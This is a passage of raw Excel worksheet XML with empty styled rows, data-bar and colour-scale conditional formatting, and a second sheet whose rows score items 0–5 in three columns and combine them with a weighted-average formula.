    <row r="379" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F379" s="14"/>
      <c r="G379" s="14"/>
      <c r="H379" s="14"/>
      <c r="I379" s="15"/>
    </row>
    <row r="380" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F380" s="14"/>
      <c r="G380" s="14"/>
      <c r="H380" s="14"/>
      <c r="I380" s="15"/>
    </row>
    <row r="381" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F381" s="14"/>
      <c r="G381" s="14"/>
      <c r="H381" s="14"/>
      <c r="I381" s="15"/>
    </row>
    <row r="382" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F382" s="14"/>
      <c r="G382" s="14"/>
      <c r="H382" s="14"/>
      <c r="I382" s="15"/>
    </row>
    <row r="383" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F383" s="14"/>
      <c r="G383" s="14"/>
      <c r="H383" s="14"/>
      <c r="I383" s="15"/>
    </row>
    <row r="384" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F384" s="14"/>
      <c r="G384" s="14"/>
      <c r="H384" s="14"/>
      <c r="I384" s="15"/>
    </row>
    <row r="385" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F385" s="14"/>
      <c r="G385" s="14"/>
      <c r="H385" s="14"/>
      <c r="I385" s="15"/>
    </row>
    <row r="386" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F386" s="14"/>
      <c r="G386" s="14"/>
      <c r="H386" s="14"/>
      <c r="I386" s="15"/>
    </row>
    <row r="387" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F387" s="14"/>
      <c r="G387" s="14"/>
      <c r="H387" s="14"/>
      <c r="I387" s="15"/>
    </row>
    <row r="388" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F388" s="14"/>
      <c r="G388" s="14"/>
      <c r="H388" s="14"/>
      <c r="I388" s="15"/>
    </row>
    <row r="389" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F389" s="14"/>
      <c r="G389" s="14"/>
      <c r="H389" s="14"/>
      <c r="I389" s="15"/>
    </row>
    <row r="390" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F390" s="14"/>
      <c r="G390" s="14"/>
      <c r="H390" s="14"/>
      <c r="I390" s="15"/>
    </row>
    <row r="391" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F391" s="14"/>
      <c r="G391" s="14"/>
      <c r="H391" s="14"/>
      <c r="I391" s="15"/>
    </row>
    <row r="392" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F392" s="14"/>
      <c r="G392" s="14"/>
      <c r="H392" s="14"/>
      <c r="I392" s="15"/>
    </row>
    <row r="393" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F393" s="14"/>
      <c r="G393" s="14"/>
      <c r="H393" s="14"/>
      <c r="I393" s="15"/>
    </row>
    <row r="394" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F394" s="14"/>
      <c r="G394" s="14"/>
      <c r="H394" s="14"/>
      <c r="I394" s="15"/>
    </row>
    <row r="395" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F395" s="14"/>
      <c r="G395" s="14"/>
      <c r="H395" s="14"/>
      <c r="I395" s="15"/>
    </row>
    <row r="396" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F396" s="14"/>
      <c r="G396" s="14"/>
      <c r="H396" s="14"/>
      <c r="I396" s="15"/>
    </row>
    <row r="397" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F397" s="14"/>
      <c r="G397" s="14"/>
      <c r="H397" s="14"/>
      <c r="I397" s="15"/>
    </row>
    <row r="398" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F398" s="14"/>
      <c r="G398" s="14"/>
      <c r="H398" s="14"/>
      <c r="I398" s="15"/>
    </row>
    <row r="399" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F399" s="14"/>
      <c r="G399" s="14"/>
      <c r="H399" s="14"/>
      <c r="I399" s="15"/>
    </row>
    <row r="400" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F400" s="14"/>
      <c r="G400" s="14"/>
      <c r="H400" s="14"/>
      <c r="I400" s="15"/>
    </row>
    <row r="401" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F401" s="14"/>
      <c r="G401" s="14"/>
      <c r="H401" s="14"/>
      <c r="I401" s="15"/>
    </row>
    <row r="402" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F402" s="14"/>
      <c r="G402" s="14"/>
      <c r="H402" s="14"/>
      <c r="I402" s="15"/>
    </row>
    <row r="403" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F403" s="14"/>
      <c r="G403" s="14"/>
      <c r="H403" s="14"/>
      <c r="I403" s="15"/>
    </row>
    <row r="404" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F404" s="14"/>
      <c r="G404" s="14"/>
      <c r="H404" s="14"/>
      <c r="I404" s="15"/>
    </row>
    <row r="405" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F405" s="14"/>
      <c r="G405" s="14"/>
      <c r="H405" s="14"/>
      <c r="I405" s="15"/>
    </row>
    <row r="406" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F406" s="14"/>
      <c r="G406" s="14"/>
      <c r="H406" s="14"/>
      <c r="I406" s="15"/>
    </row>
    <row r="407" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F407" s="14"/>
      <c r="G407" s="14"/>
      <c r="H407" s="14"/>
      <c r="I407" s="15"/>
    </row>
    <row r="408" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F408" s="14"/>
      <c r="G408" s="14"/>
      <c r="H408" s="14"/>
      <c r="I408" s="15"/>
    </row>
    <row r="409" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F409" s="14"/>
      <c r="G409" s="14"/>
      <c r="H409" s="14"/>
      <c r="I409" s="15"/>
    </row>
    <row r="410" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F410" s="14"/>
      <c r="G410" s="14"/>
      <c r="H410" s="14"/>
      <c r="I410" s="15"/>
    </row>
    <row r="411" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F411" s="14"/>
      <c r="G411" s="14"/>
      <c r="H411" s="14"/>
      <c r="I411" s="15"/>
    </row>
    <row r="412" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F412" s="14"/>
      <c r="G412" s="14"/>
      <c r="H412" s="14"/>
      <c r="I412" s="15"/>
    </row>
    <row r="413" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F413" s="14"/>
      <c r="G413" s="14"/>
      <c r="H413" s="14"/>
      <c r="I413" s="15"/>
    </row>
    <row r="414" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F414" s="14"/>
      <c r="G414" s="14"/>
      <c r="H414" s="14"/>
      <c r="I414" s="15"/>
    </row>
    <row r="415" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F415" s="14"/>
      <c r="G415" s="14"/>
      <c r="H415" s="14"/>
      <c r="I415" s="15"/>
    </row>
    <row r="416" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F416" s="14"/>
      <c r="G416" s="14"/>
      <c r="H416" s="14"/>
      <c r="I416" s="15"/>
    </row>
    <row r="417" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F417" s="14"/>
      <c r="G417" s="14"/>
      <c r="H417" s="14"/>
      <c r="I417" s="15"/>
    </row>
    <row r="418" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F418" s="14"/>
      <c r="G418" s="14"/>
      <c r="H418" s="14"/>
      <c r="I418" s="15"/>
    </row>
    <row r="419" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F419" s="14"/>
      <c r="G419" s="14"/>
      <c r="H419" s="14"/>
      <c r="I419" s="15"/>
    </row>
    <row r="420" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F420" s="14"/>
      <c r="G420" s="14"/>
      <c r="H420" s="14"/>
      <c r="I420" s="15"/>
    </row>
    <row r="421" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F421" s="14"/>
      <c r="G421" s="14"/>
      <c r="H421" s="14"/>
      <c r="I421" s="15"/>
    </row>
    <row r="422" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F422" s="14"/>
      <c r="G422" s="14"/>
      <c r="H422" s="14"/>
      <c r="I422" s="15"/>
    </row>
    <row r="423" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F423" s="14"/>
      <c r="G423" s="14"/>
      <c r="H423" s="14"/>
      <c r="I423" s="15"/>
    </row>
    <row r="424" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F424" s="14"/>
      <c r="G424" s="14"/>
      <c r="H424" s="14"/>
      <c r="I424" s="15"/>
    </row>
    <row r="425" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F425" s="14"/>
      <c r="G425" s="14"/>
      <c r="H425" s="14"/>
      <c r="I425" s="15"/>
    </row>
    <row r="426" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F426" s="14"/>
      <c r="G426" s="14"/>
      <c r="H426" s="14"/>
      <c r="I426" s="15"/>
    </row>
    <row r="427" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F427" s="14"/>
      <c r="G427" s="14"/>
      <c r="H427" s="14"/>
      <c r="I427" s="15"/>
    </row>
    <row r="428" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F428" s="14"/>
      <c r="G428" s="14"/>
      <c r="H428" s="14"/>
      <c r="I428" s="15"/>
    </row>
    <row r="429" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F429" s="14"/>
      <c r="G429" s="14"/>
      <c r="H429" s="14"/>
      <c r="I429" s="15"/>
    </row>
    <row r="430" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F430" s="14"/>
      <c r="G430" s="14"/>
      <c r="H430" s="14"/>
      <c r="I430" s="15"/>
    </row>
    <row r="431" spans="6:9" x14ac:dyDescent="0.2">
      <c r="F431" s="14"/>
      <c r="G431" s="14"/>
      <c r="H431" s="14"/>
      <c r="I431" s="15"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="I2:I80">
    <cfRule type="dataBar" priority="4">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{E8D27D51-069E-429A-8F09-43FE99525147}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="L8">
    <cfRule type="colorScale" priority="5">
      <colorScale>
        <cfvo type="min"/>
        <cfvo type="percent" val="50"/>
        <cfvo type="max"/>
        <color rgb="FFF8696B"/>
        <color rgb="FFFFEB84"/>
        <color rgb="FF63BE7B"/>
      </colorScale>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F2:H1048576">
    <cfRule type="dataBar" priority="3">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{B7542DF4-7D24-493E-962D-EDAD339DD517}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I81:I268">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{4157CF3F-3FAA-4DD1-932C-59ED1E6BA216}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>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8D27D51-069E-429A-8F09-43FE99525147}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>I2:I80</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{B7542DF4-7D24-493E-962D-EDAD339DD517}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F2:H1048576</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{4157CF3F-3FAA-4DD1-932C-59ED1E6BA216}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>I81:I268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8B24-83F3-4DD6-84AB-5E3AAD13A0D0}">
  <dimension ref="A1:Z431"/>
  <sheetViews>
    <sheetView zoomScale="180" zoomScaleNormal="180" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="A28" sqref="A28"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="32.1640625" customWidth="1"/>
    <col min="2" max="2" width="47.6640625" customWidth="1"/>
    <col min="3" max="5" width="20.6640625" style="2" customWidth="1"/>
    <col min="6" max="6" width="32.5" style="1" customWidth="1"/>
    <col min="7" max="26" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="42" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="44" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="44" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="44" t="s">
        <v>4</v>
      </c>
      <c r="F1" s="31" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A2" s="41" t="s">
        <v>6</v>
      </c>
      <c r="B2" s="45" t="s">
        <v>7</v>
      </c>
      <c r="C2" s="14">
        <v>5</v>
      </c>
      <c r="D2" s="14">
        <v>4</v>
      </c>
      <c r="E2" s="14">
        <v>3</v>
      </c>
      <c r="F2" s="32">
        <f t="shared" ref="F2:F65" si="0">((C2*2)+D2+(E2*2))/5</f>
        <v>4</v>
      </c>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A3" s="41" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="45" t="s">
        <v>9</v>
      </c>
      <c r="C3" s="14">
        <v>1</v>
      </c>
      <c r="D3" s="14">
        <v>1</v>
      </c>
      <c r="E3" s="14">
        <v>2</v>
      </c>
      <c r="F3" s="32">
        <f t="shared" si="0"/>
        <v>1.4</v>
      </c>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A4" s="41" t="s">
        <v>10</v>
      </c>
      <c r="B4" s="45"/>
      <c r="C4" s="14">
        <v>3</v>
      </c>
      <c r="D4" s="14">
        <v>3</v>
      </c>
      <c r="E4" s="14">
        <v>4</v>
      </c>
      <c r="F4" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A5" s="41" t="s">
        <v>11</v>
      </c>
      <c r="B5" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C5" s="14">
        <v>3</v>
      </c>
      <c r="D5" s="14">
        <v>4</v>
      </c>
      <c r="E5" s="14">
        <v>4</v>
      </c>
      <c r="F5" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="6" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A6" s="41" t="s">
        <v>13</v>
      </c>
      <c r="B6" s="45"/>
      <c r="C6" s="14">
        <v>0</v>
      </c>
      <c r="D6" s="14">
        <v>0</v>
      </c>
      <c r="E6" s="14">
        <v>0</v>
      </c>
      <c r="F6" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A7" s="41" t="s">
        <v>14</v>
      </c>
      <c r="B7" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C7" s="14">
        <v>3</v>
      </c>
      <c r="D7" s="14">
        <v>3</v>
      </c>
      <c r="E7" s="14">
        <v>2</v>
      </c>
      <c r="F7" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A8" s="41" t="s">
        <v>15</v>
      </c>
      <c r="B8" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C8" s="14">
        <v>3</v>
      </c>
      <c r="D8" s="14">
        <v>3</v>
      </c>
      <c r="E8" s="14">
        <v>2</v>
      </c>
      <c r="F8" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A9" s="41" t="s">
        <v>16</v>
      </c>
      <c r="B9" s="45"/>
      <c r="C9" s="14">
        <v>2</v>
      </c>
      <c r="D9" s="14">
        <v>2</v>
      </c>
      <c r="E9" s="14">
        <v>2</v>
      </c>
      <c r="F9" s="32">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A10" s="41" t="s">
        <v>17</v>
      </c>
      <c r="B10" s="45" t="s">
        <v>18</v>
      </c>
      <c r="C10" s="14">
        <v>2</v>
      </c>
      <c r="D10" s="14">
        <v>1</v>
      </c>
      <c r="E10" s="14">
        <v>2</v>
      </c>
      <c r="F10" s="32">
        <f t="shared" si="0"/>
        <v>1.8</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A11" s="41" t="s">
        <v>19</v>
      </c>
      <c r="B11" s="45" t="s">
        <v>20</v>
      </c>
      <c r="C11" s="14">
        <v>3</v>
      </c>
      <c r="D11" s="14">
        <v>3</v>
      </c>
      <c r="E11" s="14">
        <v>4</v>
      </c>
      <c r="F11" s="32">
        <f t="shared" si="0"/>
        <v>3.4</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A12" s="41" t="s">
        <v>21</v>
      </c>
      <c r="B12" s="45"/>
      <c r="C12" s="14">
        <v>5</v>
      </c>
      <c r="D12" s="14">
        <v>4</v>
      </c>
      <c r="E12" s="14">
        <v>3</v>
      </c>
      <c r="F12" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="13" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A13" s="41" t="s">
        <v>22</v>
      </c>
      <c r="B13" s="45"/>
      <c r="C13" s="14">
        <v>2</v>
      </c>
      <c r="D13" s="14">
        <v>1</v>
      </c>
      <c r="E13" s="14">
        <v>4</v>
      </c>
      <c r="F13" s="32">
        <f t="shared" si="0"/>
        <v>2.6</v>
      </c>
    </row>
    <row r="14" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A14" s="41" t="s">
        <v>23</v>
      </c>
      <c r="B14" s="45" t="s">
        <v>12</v>
      </c>
      <c r="C14" s="14">
        <v>3</v>
      </c>
      <c r="D14" s="14">
        <v>4</v>
      </c>
      <c r="E14" s="14">
        <v>4</v>
      </c>
      <c r="F14" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A15" s="41" t="s">
        <v>24</v>
      </c>
      <c r="B15" s="45" t="s">
        <v>25</v>
      </c>
      <c r="C15" s="14">
        <v>4</v>
      </c>
      <c r="D15" s="14">
        <v>4</v>
      </c>
      <c r="E15" s="14">
        <v>4</v>
      </c>
      <c r="F15" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A16" s="41" t="s">
        <v>26</v>
      </c>
      <c r="B16" s="45" t="s">
        <v>27</v>
      </c>
      <c r="C16" s="14">
        <v>5</v>
      </c>
      <c r="D16" s="14">
        <v>4</v>
      </c>
      <c r="E16" s="14">
        <v>3</v>
      </c>
      <c r="F16" s="32">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A17" s="54" t="s">
        <v>28</v>
      </c>
      <c r="B17" s="45"/>
      <c r="C17" s="14">
        <v>1</v>
      </c>
      <c r="D17" s="14">
        <v>2</v>
      </c>
      <c r="E17" s="14">
        <v>2</v>
      </c>
      <c r="F17" s="32">
        <f t="shared" si="0"/>
        <v>1.6</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A18" s="41" t="s">
        <v>29</v>
      </c>
      <c r="B18" s="45"/>
      <c r="C18" s="14">
        <v>3</v>
      </c>
      <c r="D18" s="14">
        <v>4</v>
      </c>
      <c r="E18" s="14">
        <v>4</v>
      </c>
      <c r="F18" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A19" s="41" t="s">
        <v>30</v>
      </c>
      <c r="B19" s="45" t="s">
        <v>31</v>
      </c>
      <c r="C19" s="14">
        <v>0</v>
      </c>
      <c r="D19" s="14">
        <v>0</v>
      </c>
      <c r="E19" s="14">
        <v>0</v>
      </c>
      <c r="F19" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A20" s="41" t="s">
        <v>32</v>
      </c>
      <c r="B20" s="45"/>
      <c r="C20" s="14">
        <v>4</v>
      </c>
      <c r="D20" s="14">
        <v>4</v>
      </c>
      <c r="E20" s="14">
        <v>3</v>
      </c>
      <c r="F20" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A21" s="41" t="s">
        <v>33</v>
      </c>
      <c r="B21" s="45"/>
      <c r="C21" s="14">
        <v>3</v>
      </c>
      <c r="D21" s="14">
        <v>4</v>
      </c>
      <c r="E21" s="14">
        <v>4</v>
      </c>
      <c r="F21" s="32">
        <f t="shared" si="0"/>
        <v>3.6</v>
      </c>
    </row>
    <row r="22" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A22" s="41" t="s">
        <v>34</v>
      </c>
      <c r="B22" s="45" t="s">
        <v>35</v>
      </c>
      <c r="C22" s="14">
        <v>3</v>
      </c>
      <c r="D22" s="14">
        <v>4</v>
      </c>
      <c r="E22" s="14">
        <v>3</v>
      </c>
      <c r="F22" s="32">
        <f t="shared" si="0"/>
        <v>3.2</v>
      </c>
    </row>
    <row r="23" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A23" s="41" t="s">
        <v>36</v>
      </c>
      <c r="B23" s="45" t="s">
        <v>31</v>
      </c>
      <c r="C23" s="14">
        <v>0</v>
      </c>
      <c r="D23" s="14">
        <v>0</v>
      </c>
      <c r="E23" s="14">
        <v>0</v>
      </c>
      <c r="F23" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A24" s="41"/>
      <c r="B24" s="45"/>
      <c r="C24" s="14">
        <v>0</v>
      </c>
      <c r="D24" s="14">
        <v>0</v>
      </c>
      <c r="E24" s="14">
        <v>0</v>
      </c>
      <c r="F24" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A25" s="41"/>
      <c r="B25" s="45"/>
      <c r="C25" s="14">
        <v>0</v>
      </c>
      <c r="D25" s="14">
        <v>0</v>
      </c>
      <c r="E25" s="14">
        <v>0</v>
      </c>
      <c r="F25" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A26" s="41"/>
      <c r="B26" s="45"/>
      <c r="C26" s="14">
        <v>0</v>
      </c>
      <c r="D26" s="14">
        <v>0</v>
      </c>
      <c r="E26" s="14">
        <v>0</v>
      </c>
      <c r="F26" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A27" s="41"/>
      <c r="B27" s="45"/>
      <c r="C27" s="14">
        <v>0</v>
      </c>
      <c r="D27" s="14">
        <v>0</v>
      </c>
      <c r="E27" s="14">
        <v>0</v>
      </c>
      <c r="F27" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A28" s="41"/>
      <c r="B28" s="45"/>
      <c r="C28" s="14">
        <v>0</v>
      </c>
      <c r="D28" s="14">
        <v>0</v>
      </c>
      <c r="E28" s="14">
        <v>0</v>
      </c>
      <c r="F28" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A29" s="41"/>
      <c r="B29" s="45"/>
      <c r="C29" s="14">
        <v>0</v>
      </c>
      <c r="D29" s="14">
        <v>0</v>
      </c>
      <c r="E29" s="14">
        <v>0</v>
      </c>
      <c r="F29" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A30" s="41"/>
      <c r="B30" s="45"/>
      <c r="C30" s="14">
        <v>0</v>
      </c>
      <c r="D30" s="14">
        <v>0</v>
      </c>
      <c r="E30" s="14">
        <v>0</v>
      </c>
      <c r="F30" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A31" s="41"/>
      <c r="B31" s="45"/>
      <c r="C31" s="14">
        <v>0</v>
      </c>
      <c r="D31" s="14">
        <v>0</v>
      </c>
      <c r="E31" s="14">
        <v>0</v>
      </c>
      <c r="F31" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A32" s="41"/>
      <c r="B32" s="45"/>
      <c r="C32" s="14">
        <v>0</v>
      </c>
      <c r="D32" s="14">
        <v>0</v>
      </c>
      <c r="E32" s="14">
        <v>0</v>
      </c>
      <c r="F32" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A33" s="41"/>
      <c r="B33" s="45"/>
      <c r="C33" s="14">
        <v>0</v>
      </c>
      <c r="D33" s="14">
        <v>0</v>
      </c>
      <c r="E33" s="14">
        <v>0</v>
      </c>
      <c r="F33" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A34" s="41"/>
      <c r="B34" s="45"/>
      <c r="C34" s="14">
        <v>0</v>
      </c>
      <c r="D34" s="14">
        <v>0</v>
      </c>
      <c r="E34" s="14">
        <v>0</v>
      </c>
      <c r="F34" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A35" s="41"/>
      <c r="B35" s="45"/>
      <c r="C35" s="14">
        <v>0</v>
      </c>
      <c r="D35" s="14">
        <v>0</v>
      </c>
      <c r="E35" s="14">
        <v>0</v>
      </c>
      <c r="F35" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A36" s="41"/>
      <c r="B36" s="45"/>
      <c r="C36" s="14">
        <v>0</v>
      </c>
      <c r="D36" s="14">
        <v>0</v>
      </c>
      <c r="E36" s="14">
        <v>0</v>
      </c>
      <c r="F36" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A37" s="41"/>
      <c r="B37" s="45"/>
      <c r="C37" s="14">
        <v>0</v>
      </c>
      <c r="D37" s="14">
        <v>0</v>
      </c>
      <c r="E37" s="14">
        <v>0</v>
      </c>
      <c r="F37" s="32">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A38" s="41"/>
